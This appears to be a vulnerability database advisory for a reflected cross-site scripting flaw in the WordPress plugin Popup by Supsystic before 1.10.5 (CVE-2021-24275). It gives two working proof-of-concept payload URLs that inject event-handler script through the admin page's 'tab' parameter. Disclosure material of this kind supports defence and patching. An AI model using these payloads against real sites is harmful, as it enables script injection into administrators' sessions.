Lucene search
0xB9WPVDB-ID:EFDC76E0-C14A-4BAF-AF70-9D381107308FHistoryApr 19, 2021 - 12:00 a.m.
Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
2021-04-1900:00:00
0xB9
wpscan.com
4
The plugin did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
PoC
/wp-admin/admin.php?page=popup-wp-supsystic&tab;=“onmouseover=alert(1)// /wp-admin/admin.php?page=popup-wp-supsystic&tab;=”+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
| CPE | Name | Operator | Version |
|---|---|---|---|
| popup-by-supsystic | lt | 1.10.5 |
Related
zdt
zdt
WordPress Popup 1.10.4 Plugin - Reflected Cross-Site Scripting Vulnerability
2021-09-28 00:00:00
wpexploit
wpexploit
Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
2021-04-19 00:00:00
patchstack
patchstack
cve
cve
CVE-2021-24275
2021-05-05 19:15:00
nuclei
nuclei
Popup by Supsystic <1.10.5 - Cross-Site scripting
2021-09-28 17:03:24
prion
prion
Cross site scripting
2021-05-05 19:15:00
packetstorm
packetstorm
WordPress Popup 1.10.4 Cross Site Scripting
2021-09-28 00:00:00
exploitdb
exploitdb
WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
2021-09-28 00:00:00
Related for WPVDB-ID:EFDC76E0-C14A-4BAF-AF70-9D381107308F